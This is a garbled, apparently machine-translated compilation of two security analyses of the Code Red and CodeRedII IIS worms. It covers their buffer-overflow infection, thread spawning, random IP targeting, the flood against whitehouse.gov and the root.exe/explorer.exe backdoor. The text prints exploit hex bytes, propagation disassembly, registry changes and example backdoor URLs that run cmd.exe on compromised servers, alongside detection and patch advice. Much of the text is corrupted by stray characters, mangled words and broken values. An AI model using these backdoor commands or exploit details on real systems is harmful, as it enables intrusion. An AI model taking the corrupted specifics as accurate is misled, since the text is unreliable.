Code Red uses the IIS web server. IDA buffer overflow vulnerability propagation. If it is infected with a host, it will work as follows on the affected machine: 1, establish the initial worm environment 2, build 100 worm threads 3, the first 99 threads will spread infected other hosts 4, 100th thread If you are running on whether it is running on an English version, if it is, it will replace the host page Welcome to http://www.min.com!, Hacked by Chinese! This information will automatically disappear after 10 hours. Unless it is again being infected again. If it is not an English version, it will also be used as other hosts. 5, each thread checks the local time if the time is between 20:00 UTC and 23:59 UTC, the thread sends 100K byte data to www.whitehouse.gov. If less than 20:00 UTC, it will continue to propagate other hosts in the following detailed analysis, it will be used to use IDA (Interactive Disassembler), which comes from www.datarescue.com. MS VC debugging environment I divide the worm into three parts to study: core function module, Hack web page module, attack www.whitehouse.gov module. First, the core function module 1, the start infection container (hosting that has been infected) is infected, the system memory will present the following information when infected.
4e 00 4e 00 4e 00 4e 00
4e 00 4e 00 4e 00 4e 00
4e 00 4e 00 4e 00 4e 00
92 90 58 68 4e 00 4e 00
4e 00 4e 00 4e 00 4e 00
Fa 00 00 00 90 90 58 68
D3 CB 01 78 90 90 58 68
D3 CB 01 78 90 90 58 68
D3 CB 01 78 90 90 90 90
90 81 C3 00 03 00 00 8B
1B 53 FF 53 78
EIP will be overwritten by 0x7801cbd3. The code at 0x7801CBD3 will be broken down into Call EBX, when EIP is rewritten by Call EBX, the arcs, Jia Lu, 蛄 囟ㄏ蚧囟 囟ㄏ蚧囟 囟ㄏ蚧囟 6 簧 系 涑娲 朐谄 鹗? HTTP request body.
2, establish the starting stack variable
Coderef: seg000: 000001d6 Worm
First, the worm builds a 218H byte stack filled with CCH, then it will turn to activate the jump function.
All variables are referenced as EBP-X values.
3, load function (establish a jump table "jump table")
Coderef: seg000: 00000203 DataSetup
First, the worm refers to the data part of the Exploit code in EBP-198H. Then it needs to create its own internal function jump table.
The worm uses a RVA (Relative Virtual Addresses) query technology, in a nutshell, RAV is used to get the address of getProcAddress. GetProcaddress is then used to get the LoadLibrarya address. It uses these two functions to load the following functions:
> From kernel32.dll:
GetSystemTime
CreateThread
Createfilea
Sleep
Getsystemdefaultlangid
VirtualProtect
> From infocomm.dll:
TCPSOCKSEND
> From ws2_32.dll:
Socket
Connect
Send
RECV
CloseSocket
Finally, the worm stores the base address of W3SVC.DLL, which will be used to change the page. 4. Check the thread that has been created:
Coderef: seg000: 00000512 func_load_done
It runs the WriteClient (part of the Isapi Extension API) to send "GET" back to the attacking machine. This should be telling the attack that it has successfully infected the machine.
Then, it will calculate the cormofworm thread
If the thread is equal to 100, the control will turn to the HACK web page function item.
If the thread is less than 100, it creates a new thread. Each new thread is a simple copy of the worm.
5, check the existing C: / NotWorm
It has a "Lysine Deficiency" feature to keep malicious code further propagate.
If the file exists, it will not make another action; if it does not exist, it will perform the next step.
6, check the affected system time:
Coderef: seg000: 00000803 NotWorm_no
Coderef: seg000: 0000079d do_the_work
If the time is between 20:00 UTC and 23:59 UTC, the thread will send 100K byte data to www.whitehouse.gov.
If less than 20:00 UTC, it will continue to spread other hosts
7, infecting a new host
If you can create an 80-port connection, it will send your own copy to that IP, if the send is successful, it will turn off the socket and go to step 5 to start a new loop.
Second, HACK WebPage module
If 100 threads are generated, the module will be called
1. Check if the system language is English, then go to the core module. Step 5
Coderef: seg000: 000005fe TOO_MANY_THREADS
2, sleep for 2 hours
Coderef: seg000: 00000636 IS_AMERICAN
This should be as possible before changing the page.
3, try to change the web page of the affected system
Coderef: seg000: 0000064f HACK_PAGE
Third, attack www.whitehouse.gov module
Create a socket connection to www.whitehouse.gov 80 port Send 100K byte data:
Coderef: seg000: 000008ad Whitehouse_socket_setup
First, it creates a socket and connects to 198.137.240.91 (www.whitehouse.gov/www1.whitehouse.gov) 80 port,
Coderef: seg000: 0000092f Whitehouse_socket_send
If the connection is successful, it creates a loop: send 18000h single-byte send () 's to the site
CodeRef: seg000: 00000972 Whitehouse_sleep_loop
After 18000H Send () '', it will sleep for 4 and a half, then repeat this attack.
From: marc maiffret
BY NTBUGTRAQ Maillist
CNNS compilation
solution:
1. If the system has been infected, please download the installation patch at Microsoft, and restart the machine, relevant information
http://www.cnns.net/article/db/1720.htm
2. If it is not sure, you can use it in the MS-DOS prompt to see the NetStat -an view, if there are too many external arbitrary IP 80 ports, it may be infected.
Worm, Like The Original Code Red Worm, Will Only Exploit Windows 2000Web Servers Because It Overwrites Eip with a jmp this iS Only Correct Under
Windows 2000. Under NT 4.0 That Offset Is Different, So The Process Will Simply
Crash INSTEAD OF ALOWING The WORM to Infect The System and Spread.
This Analysis is of the newly spreading coderedii.
To See More Information About The Previous Version of Code Red Please See Our
Previous Advisory:
Continued Threat of The "Code Red" WORM
Details
This Analysis is Broken Up Into 3 Sections: Infection, Propagation, Trojan
To check if your system has been infected, look for the existence of the files:
C: /explorer.exe
D: /explorer.exe
Also Check Your Iis S Folder and Msadc Folder To See If The File Root.exe
EXISTS. if it does life you have motone. Note:
An Older Sadmin Unicode Worm Also Would Rename Cmd.exe To Root.exe So you Could
Have a bit of cross over there.
To Download this Analysis and all disassembly files the go to:
http://www.eeye.com/html/advisories/coderedii.zip
Infection:
1st infection:
A. The First Thing the Worm Does Is Setup a Jump Table So That It Can Get To All
OF ITS Needed Functions.
SEG000: 000001D0
B. The Worm The Proceeds To Get Its Local IP Address. This is later used to deal
WITH SUBNET MASKS (PROPAGATION) AND to Make Sure That The Worm Does Not Re-Infect
The Local System.
SEG000: 000001D5
C. Next, THE WORM GETS The Local System Language To See iF The Local System Is Running
Chinese (taiwanese) or Chinese.
SEG000: 000001F9
D. At this Point The Worm Checks IF WE Have Executed Before, Andiff Executed Before, Andiff So, THEN THE
Worm Will Proceed to The Propagation Section. (See The PropAgation Section)
SEG000: 0000021AE. Next, The Worm Will Check To See if a Coderedii Atom Has Been Placed
(GlobalFindatoma). This functionality allows the Worm to make Sure Not to Re-Infect
The local machine. if it sees what atom exissrs the it. ..
Seg000: 00000240
F. The Worm Will Add a Coderedii Atom. This is to allow the Worm The FunctionAlity
To check to see letter a system has already been infread with the Worm.
SEG000: 0000027D
G. The Worm Now Sets ITS Number of Threads to 300 for non-Chinese systems. If The
System is chinese kiln it sets it to 600.seg000: 00000286
H. At this Point The Worm Spawns a Thread Starting Back At Step A. The Worm Will
Spawn Threads According to the Number Set from G. Each New Thread Will Be a Propagation
Thread.
SEG000: 000002BA
I. this is where the Worm Calls the Trojan Functionality. You can Find an Analysis of
The Trojan Mechanism Down Below In The Trojan System Seg000: 000002C4
K. The Worm The Local System Is Not Chinese, 2 Days if IT IS.
SEG000: 000002DA
L. Reboot Windows.
SEG000: 000002E1
Propagation:
This is used to spread the Worm Further.
SEG000: 000002EB
A. Setup local ip_storage variable. This is buy for Wormation functionality and
To make Sure Not to Re-Infect The Local System.
SEG000: 000002EB
B. Sleep for 64h MilliseConds
SEG000: 000002F1
C. Get Local System Time. The Worm Checks To See iF It The Year Is Less Than 2002 OR
If The Month Is Less Than 10. if The date is beyond Either of Those, THEN THE WORM
Reboots The Local System. That Limits The Worm To 10/01 for ITS SPREADING (in a Perfect
World.)
SEG000: 000002FD
D. Setup SockAddr_in. This will reason the get_ip section.
SEG000: 0000031A
E. Setup Socket: This Performs a socket (), Stores The Handle, Then Makes It Anon-Blocking Socket (This Is Important for Speed Dealing with Connect () Calls
Seg000: 00000337
F. Connect To The Remote Host, IF It Returns A Connect Right Away, Go To H.
seg000: 00000357
The Following Is How The Worm Generates The IP Address for The next Host To Connect TO:
Get_ip:; code Xref: SUB_1C4 168 P
Call get_octet; load 4th actet (this is in reverse order Due to byte order)
MOV BH, Al
Call get_octet; get 3rd octet
MOV BL, Al
SHL EBX, 10H; Shift Bx To The Top of EBX
Call get_octet; get 2nd octet
MOV BH, Al
Call get_octet; 1st
MOV BL, Al
Call Gen_OCTET; GET first OCTET
And Eax, 7; And IT by 7
Call Check_addr_mask; ECX HAS EIP
For Each Oclet, Generate A Pseudo Random Byte Between 1 and 254, Next Get A Random
OcTet Between 1 and 254 and mask it by 7 finally, use this last byte to gen a 1st octet.
MOST Pertden Bit Is Check_addr_mask
This specifies the folload:
DD 0FFFFFFFH; 0 - Addr Masks
DD 0FFFFFFFFF00H; 1
DD 0fffffff00h; 2
DD 0FFFFFFFFFFFF00h; 3
DD 0fffffff00h; 4
DD 0FFFF0000H; 5
DD 0FFFF0000H; 6
DD 0FFFFFFFFFFFFFFFFFFFffffFFFFFFFFFFFFFF0000h; 7
THIS Mask is Applied To The Local Systems IP Address, And Matched to The Generated IP
Adject. This Makes a new ip with 0,1 or 2 bytes of data with the local ip.
For Instance, The Worm Will 1 / 8th of The Time Generate A Random IP NOT WITHIN Any
Ranges of the Local IP Address.
1 / 2TH of the Time, IT Will Stay Within The Same Class A Range of The Local IP Address
3 / 8th of the Time, IT Will Stay Wtem, Class B Range of the Local IP Address
Also, Note That if The ip The Worm Generates IS 127.x.x.x, 224.x.x.x, or the Same AS
The Local Systems IP Address THE WORM WILL SKIP That IP Address and Generate Anew IP Address To try to infect.
The Way The Worm Generates IP Addresses Allows It To Find More Possible IIS Web Servers
Quicker the the Other Codeled Worms That Have Previously Been Released. This New Worm
Is Also Going to Cause Cause A Lot More Data To Be Zig Zaged Across NetWorks.
G. Do a select to get the handle. If no handle is return, the go to k.
SEG000: 000003B6
H. Set Socket to Blocking. This is so select is not required after the connection.
SEG000: 000003C5
I. Send a Copy of The Worm.
SEG000: 000003E4
J. DO a RECV (), this is not actually useful anywhere.
SEG000: 000003FC
K. Close the socket and loop to A.
Trojan System:
This Portion of the Worm Is Designed to Dump Root.exe (root.exe is cmd.exe) INTO MSADC
And S, AND Create a Trojan on the local drive.
Seg000: 00000804
A. Get System Directory, This Gets The Native System Directory (i.e., c: / winnt / system32)
SEG000: 00000810
B. append cmd to the system directory string (c: /winnt/system32/cmd.exe)
Seg000: 00000828
C. SET Drive Modifier to C:
SEG000: 0000082D
D. COPY cmd.exe to / s / root.exe (actual path: drivemodifier: / inetpub / s / root.exe)
Seg000: 00000831
E. Copy cmd.exe to /msadc/root.exe (actual path: drivemodifier: /progra ~1/common ~1/system/msadc/root.exe)
Seg000: 00000863
F. Initialize Area for Explorer.exe
SEG000: 000008A2
G. Create Drive / Explorer.exe (Drive is C, Then D)
SEG000: 00000E83
H. The Worm Now Writes Out Explorer.exe. There Is An Embedded Binary Withnin The Worm
That Will Be Written Out To Explorer.exe. It has the property That if an embedded Byte
IS 0xFC, IT Replaced by 20h 0x00 Bytes instead of the regular byte. for more on what
The Trojan Explorer.exe Binary Does Trojan Section. Alsothe Way Nt Works Is That WHEN A User Logs Into The Local System It Has To Load
Explorer.exe (Desktop, Task Bar, ETC.) HOWEVER NT Looks for Explorer.exe First in The
Main Drive Path C: / Which Means The Trojan Explorer.exe Is Going to Be loading the next
Time a user logs in - Therefore the system Trojaned over and reviewly.
SEG000: 00000EC8
I. Close Explorer.exe
SEG000: 00000ED5
J. Change Drive Modifier To D, THE WORM GoES back to the code in step d. after IT
IS DONE THEN IT GoES BACK to Step K of The Infection Process.
SEG000: 00000EDD
Explorer.exe Trojan:
Explorer.exe Quick Overview:
Get Local Systems Windows Directory.
2. Execute Explorer.exe from help The local systems Windows Directory.
3. The Worm Now Goes Into The Following Loop:
While (1)
{
Set Software / Microsoft / Windows NT / CurrentVersion / Winlogon / SFCDISABLE TO
0FFFFFFFF9DH, Which Basical Disables System File Protection.
SET SYSTEM / CURRENTCONTROLSET / Services / W3SVC / Parameters / Virtual Roots / Scripts To, 217
Set System / CurrentControlSet / Services / W3SVC / Parameters / Virtual Roots / Msadc To, 217
SET SYSTEM / CURRENTCONTROLSET / Services / W3SVC / PARAMES / VIRTUAL ROOTS / C to C: /,, 217
Set System / CurrentControlSet / Services / W3SVC / Parameters / Virtual Roots / D to D: / ,, 217
Sleep for 10 minutes
}
The Above Code Creates A Virtual Web Path (/ C and / D) Which Maps / C To C: / And / D
TO D: /. The Writer of this Worm Has Put in this functionality to allow for a Backdoor
To Be Placed on The System So Even if You Remove the root.exe (cmd.exe promot) from Your
/ S Folder An Attacker Can Still Use The / C and / D Virtual Roots To Comze Your
System. The attcks would look like: http: // ipaddress / c / inetpub / s / root.exe? / c dir (if root.exe was still there) OR:
http://ipaddress/c/winnt/system32/cmd.exe? / c Dir Where Dir Could Be Any Command AN
Attacker Want To EXECUTE.
As long as the Trojan Explorer.exe Is Running The An Attacker Will Be Able To Remotely
Access Your Server.
AdditionAl Information
The Information Has Been Provided by Ryan Permeh and Marc MAIFFRET OF EEYE DIGITAL Security
